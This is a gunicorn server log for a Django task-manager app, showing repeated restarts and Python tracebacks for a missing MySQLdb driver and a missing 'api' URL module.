[2024-05-18 00:24:05 +0800] [28613] [INFO] Starting gunicorn 21.2.0
[2024-05-18 00:24:05 +0800] [28613] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (28613)
[2024-05-18 00:24:05 +0800] [28613] [INFO] Using worker: sync
[2024-05-18 00:24:05 +0800] [28616] [INFO] Booting worker with pid: 28616
[2024-05-18 00:24:05 +0800] [28617] [INFO] Booting worker with pid: 28617
[2024-05-18 00:24:05 +0800] [28620] [INFO] Booting worker with pid: 28620
[2024-05-18 00:38:56 +0800] [28613] [INFO] Handling signal: term
[2024-05-17 16:38:56 +0000] [28617] [INFO] Worker exiting (pid: 28617)
[2024-05-17 16:38:56 +0000] [28616] [INFO] Worker exiting (pid: 28616)
[2024-05-17 16:38:56 +0000] [28620] [INFO] Worker exiting (pid: 28620)
[2024-05-18 00:38:57 +0800] [28613] [INFO] Shutting down: Master
[2024-05-18 00:38:57 +0800] [707] [INFO] Starting gunicorn 21.2.0
[2024-05-18 00:38:57 +0800] [707] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (707)
[2024-05-18 00:38:57 +0800] [707] [INFO] Using worker: sync
[2024-05-18 00:38:57 +0800] [710] [INFO] Booting worker with pid: 710
[2024-05-18 00:38:57 +0800] [717] [INFO] Booting worker with pid: 717
[2024-05-18 00:38:57 +0800] [719] [INFO] Booting worker with pid: 719
[2024-05-18 00:43:09 +0800] [707] [INFO] Handling signal: term
[2024-05-17 16:43:09 +0000] [710] [INFO] Worker exiting (pid: 710)
[2024-05-17 16:43:09 +0000] [717] [INFO] Worker exiting (pid: 717)
[2024-05-17 16:43:09 +0000] [719] [INFO] Worker exiting (pid: 719)
[2024-05-18 00:43:09 +0800] [707] [INFO] Shutting down: Master
[2024-05-18 00:43:10 +0800] [2096] [INFO] Starting gunicorn 21.2.0
[2024-05-18 00:43:10 +0800] [2096] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (2096)
[2024-05-18 00:43:10 +0800] [2096] [INFO] Using worker: sync
[2024-05-18 00:43:10 +0800] [2099] [INFO] Booting worker with pid: 2099
[2024-05-18 00:43:10 +0800] [2101] [INFO] Booting worker with pid: 2101
[2024-05-18 00:43:10 +0800] [2103] [INFO] Booting worker with pid: 2103
[2024-05-18 00:53:25 +0800] [2096] [INFO] Handling signal: term
[2024-05-17 16:53:25 +0000] [2099] [INFO] Worker exiting (pid: 2099)
[2024-05-17 16:53:25 +0000] [2103] [INFO] Worker exiting (pid: 2103)
[2024-05-17 16:53:25 +0000] [2101] [INFO] Worker exiting (pid: 2101)
[2024-05-18 00:53:25 +0800] [2096] [INFO] Shutting down: Master
[2024-05-18 00:53:25 +0800] [5320] [INFO] Starting gunicorn 21.2.0
[2024-05-18 00:53:25 +0800] [5320] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (5320)
[2024-05-18 00:53:25 +0800] [5320] [INFO] Using worker: sync
[2024-05-18 00:53:25 +0800] [5323] [INFO] Booting worker with pid: 5323
[2024-05-18 00:53:25 +0800] [5325] [INFO] Booting worker with pid: 5325
[2024-05-18 00:53:25 +0800] [5327] [INFO] Booting worker with pid: 5327
[2024-05-18 00:58:27 +0800] [5320] [INFO] Handling signal: term
[2024-05-17 16:58:27 +0000] [5323] [INFO] Worker exiting (pid: 5323)
[2024-05-17 16:58:27 +0000] [5325] [INFO] Worker exiting (pid: 5325)
[2024-05-17 16:58:27 +0000] [5327] [INFO] Worker exiting (pid: 5327)
[2024-05-18 00:58:27 +0800] [5320] [INFO] Shutting down: Master
[2024-05-18 01:00:05 +0800] [7427] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:00:05 +0800] [7427] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (7427)
[2024-05-18 01:00:05 +0800] [7427] [INFO] Using worker: sync
[2024-05-18 01:00:05 +0800] [7430] [INFO] Booting worker with pid: 7430
[2024-05-18 01:00:05 +0800] [7432] [INFO] Booting worker with pid: 7432
[2024-05-18 01:00:05 +0800] [7434] [INFO] Booting worker with pid: 7434
[2024-05-18 01:02:49 +0800] [7427] [INFO] Handling signal: term
[2024-05-17 17:02:49 +0000] [7434] [INFO] Worker exiting (pid: 7434)
[2024-05-17 17:02:49 +0000] [7430] [INFO] Worker exiting (pid: 7430)
[2024-05-17 17:02:49 +0000] [7432] [INFO] Worker exiting (pid: 7432)
[2024-05-18 01:02:49 +0800] [7427] [INFO] Shutting down: Master
[2024-05-18 01:02:49 +0800] [8320] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:02:49 +0800] [8320] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (8320)
[2024-05-18 01:02:49 +0800] [8320] [INFO] Using worker: sync
[2024-05-18 01:02:49 +0800] [8323] [INFO] Booting worker with pid: 8323
[2024-05-18 01:02:50 +0800] [8325] [INFO] Booting worker with pid: 8325
[2024-05-18 01:02:50 +0800] [8326] [INFO] Booting worker with pid: 8326
[2024-05-18 01:04:23 +0800] [8320] [INFO] Handling signal: term
[2024-05-17 17:04:23 +0000] [8323] [INFO] Worker exiting (pid: 8323)
[2024-05-17 17:04:23 +0000] [8325] [INFO] Worker exiting (pid: 8325)
[2024-05-17 17:04:23 +0000] [8326] [INFO] Worker exiting (pid: 8326)
[2024-05-18 01:04:23 +0800] [8320] [INFO] Shutting down: Master
[2024-05-18 01:04:23 +0800] [8869] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:04:23 +0800] [8869] [INFO] Listening at: unix:/root/taskmanager/taskmanager.sock (8869)
[2024-05-18 01:04:23 +0800] [8869] [INFO] Using worker: sync
[2024-05-18 01:04:23 +0800] [8872] [INFO] Booting worker with pid: 8872
[2024-05-18 01:04:23 +0800] [8874] [INFO] Booting worker with pid: 8874
[2024-05-18 01:04:23 +0800] [8876] [INFO] Booting worker with pid: 8876
[2024-05-18 01:07:07 +0800] [8869] [INFO] Handling signal: term
[2024-05-18 01:14:33 +0800] [12137] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:14:33 +0800] [12137] [INFO] Listening at: unix:/home/taskmanager/taskmanager.sock (12137)
[2024-05-18 01:14:33 +0800] [12137] [INFO] Using worker: sync
[2024-05-18 01:14:33 +0800] [12140] [INFO] Booting worker with pid: 12140
[2024-05-18 01:14:33 +0800] [12141] [INFO] Booting worker with pid: 12141
[2024-05-18 01:14:33 +0800] [12145] [INFO] Booting worker with pid: 12145
[2024-05-17 17:14:33 +0000] [12141] [ERROR] Exception in worker process
Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/backends/mysql/base.py", line 15, in <module>
    import MySQLdb as Database
ModuleNotFoundError: No module named 'MySQLdb'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/arbiter.py", line 609, in spawn_worker
    worker.init_process()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/base.py", line 134, in init_process
    self.load_wsgi()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/base.py", line 146, in load_wsgi
    self.wsgi = self.app.wsgi()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/base.py", line 67, in wsgi
    self.callable = self.load()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 58, in load
    return self.load_wsgiapp()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 48, in load_wsgiapp
    return util.import_app(self.app_uri)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/util.py", line 371, in import_app
    mod = importlib.import_module(module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/wsgi.py", line 8, in <module>
    application = get_wsgi_application()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 3, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/options.py", line 207, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/connection.py", line 15, in __getattr__
    return getattr(self._connections[self._alias], item)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/connection.py", line 62, in __getitem__
    conn = self.create_connection(alias)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/utils.py", line 204, in create_connection
    backend = load_backend(db['ENGINE'])
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/backends/mysql/base.py", line 20, in <module>
    ) from err
django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module.
Did you install mysqlclient?
[2024-05-17 17:14:33 +0000] [12141] [INFO] Worker exiting (pid: 12141)
[2024-05-18 01:14:33 +0800] [12137] [ERROR] Worker (pid:12141) exited with code 3
[2024-05-17 17:14:33 +0000] [12140] [ERROR] Exception in worker process
Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/backends/mysql/base.py", line 15, in <module>
    import MySQLdb as Database
ModuleNotFoundError: No module named 'MySQLdb'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/arbiter.py", line 609, in spawn_worker
    worker.init_process()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/base.py", line 134, in init_process
    self.load_wsgi()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/base.py", line 146, in load_wsgi
    self.wsgi = self.app.wsgi()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/base.py", line 67, in wsgi
    self.callable = self.load()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 58, in load
    return self.load_wsgiapp()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 48, in load_wsgiapp
    return util.import_app(self.app_uri)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/util.py", line 371, in import_app
    mod = importlib.import_module(module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/wsgi.py", line 8, in <module>
    application = get_wsgi_application()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 3, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/options.py", line 207, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/connection.py", line 15, in __getattr__
    return getattr(self._connections[self._alias], item)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/connection.py", line 62, in __getitem__
    conn = self.create_connection(alias)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/utils.py", line 204, in create_connection
    backend = load_backend(db['ENGINE'])
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/backends/mysql/base.py", line 20, in <module>
    ) from err
django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module.
Did you install mysqlclient?
[2024-05-17 17:14:33 +0000] [12140] [INFO] Worker exiting (pid: 12140)
[2024-05-18 01:14:33 +0800] [12137] [ERROR] Worker (pid:12140) exited with code 3
[2024-05-17 17:14:33 +0000] [12145] [ERROR] Exception in worker process
Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/backends/mysql/base.py", line 15, in <module>
    import MySQLdb as Database
ModuleNotFoundError: No module named 'MySQLdb'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/arbiter.py", line 609, in spawn_worker
    worker.init_process()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/base.py", line 134, in init_process
    self.load_wsgi()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/workers/base.py", line 146, in load_wsgi
    self.wsgi = self.app.wsgi()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/base.py", line 67, in wsgi
    self.callable = self.load()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 58, in load
    return self.load_wsgiapp()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/app/wsgiapp.py", line 48, in load_wsgiapp
    return util.import_app(self.app_uri)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/gunicorn/util.py", line 371, in import_app
    mod = importlib.import_module(module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/wsgi.py", line 8, in <module>
    application = get_wsgi_application()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/apps/config.py", line 301, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 3, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/models/options.py", line 207, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/connection.py", line 15, in __getattr__
    return getattr(self._connections[self._alias], item)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/connection.py", line 62, in __getitem__
    conn = self.create_connection(alias)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/utils.py", line 204, in create_connection
    backend = load_backend(db['ENGINE'])
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/db/backends/mysql/base.py", line 20, in <module>
    ) from err
django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module.
Did you install mysqlclient?
[2024-05-17 17:14:33 +0000] [12145] [INFO] Worker exiting (pid: 12145)
[2024-05-18 01:19:35 +0800] [14483] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:19:35 +0800] [14483] [INFO] Listening at: unix:/home/taskmanager/taskmanager.sock (14483)
[2024-05-18 01:19:35 +0800] [14483] [INFO] Using worker: sync
[2024-05-18 01:19:35 +0800] [14486] [INFO] Booting worker with pid: 14486
[2024-05-18 01:19:35 +0800] [14487] [INFO] Booting worker with pid: 14487
[2024-05-18 01:19:35 +0800] [14490] [INFO] Booting worker with pid: 14490
[2024-05-18 01:21:41 +0800] [14483] [INFO] Handling signal: term
[2024-05-17 17:21:41 +0000] [14486] [INFO] Worker exiting (pid: 14486)
[2024-05-17 17:21:41 +0000] [14487] [INFO] Worker exiting (pid: 14487)
[2024-05-17 17:21:41 +0000] [14490] [INFO] Worker exiting (pid: 14490)
[2024-05-18 01:21:41 +0800] [14483] [INFO] Shutting down: Master
[2024-05-18 01:21:41 +0800] [15171] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:21:41 +0800] [15171] [INFO] Listening at: unix:/home/taskmanager/taskmanager.sock (15171)
[2024-05-18 01:21:41 +0800] [15171] [INFO] Using worker: sync
[2024-05-18 01:21:41 +0800] [15174] [INFO] Booting worker with pid: 15174
[2024-05-18 01:21:42 +0800] [15176] [INFO] Booting worker with pid: 15176
[2024-05-18 01:21:42 +0800] [15178] [INFO] Booting worker with pid: 15178
[2024-05-18 01:25:41 +0800] [15171] [INFO] Handling signal: term
[2024-05-17 17:25:41 +0000] [15178] [INFO] Worker exiting (pid: 15178)
[2024-05-17 17:25:41 +0000] [15174] [INFO] Worker exiting (pid: 15174)
[2024-05-17 17:25:41 +0000] [15176] [INFO] Worker exiting (pid: 15176)
[2024-05-18 01:25:41 +0800] [15171] [INFO] Shutting down: Master
[2024-05-18 01:25:42 +0800] [16401] [INFO] Starting gunicorn 21.2.0
[2024-05-18 01:25:42 +0800] [16401] [INFO] Listening at: unix:/home/taskmanager/taskmanager.sock (16401)
[2024-05-18 01:25:42 +0800] [16401] [INFO] Using worker: sync
[2024-05-18 01:25:42 +0800] [16404] [INFO] Booting worker with pid: 16404
[2024-05-18 01:25:42 +0800] [16406] [INFO] Booting worker with pid: 16406
[2024-05-18 01:25:42 +0800] [16408] [INFO] Booting worker with pid: 16408
[2024-05-17 17:26:05 +0000] [16408] [ERROR] Error handling request /
Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/base.py", line 167, in _get_response
    callback, callback_args, callback_kwargs = self.resolve_request(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/base.py", line 290, in resolve_request
    resolver_match = resolver.resolve(request.path_info)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 560, in resolve
    for pattern in self.url_patterns:
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 602, in url_patterns
    patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 941, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'api'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
    response = get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/deprecation.py", line 117, in __call__
    response = response or self.get_response(request)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 49, in inner
    response = response_for_exception(request, exc)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 114, in response_for_exception
    response = handle_uncaught_exception(request, get_resolver(get_urlconf()), sys.exc_info())
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/core/handlers/exception.py", line 152, in handle_uncaught_exception
    callback = resolver.resolve_error_handler(500)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 615, in resolve_error_handler
    callback = getattr(self.urlconf_module, 'handler%s' % view_type, None)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/utils/functional.py", line 48, in __get__
    res = instance.__dict__[self.name] = self.func(instance)
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/resolvers.py", line 595, in urlconf_module
    return import_module(self.urlconf_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 994, in _gcd_import
  File "<frozen importlib._bootstrap>", line 971, in _find_and_load
  File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
  File "<frozen importlib._bootstrap_external>", line 678, in exec_module
  File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
  File "/home/taskmanager/taskmanager/urls.py", line 10, in <module>
    path('api/', include('api.urls')),  # 假设你的API在一个叫做`api`的Django应用中
  File "/home/taskmanager/venv/lib64/python3.6/site-packages/django/urls/conf.py", line 34, in include
    urlconf_module = import_module(urlconf_module)
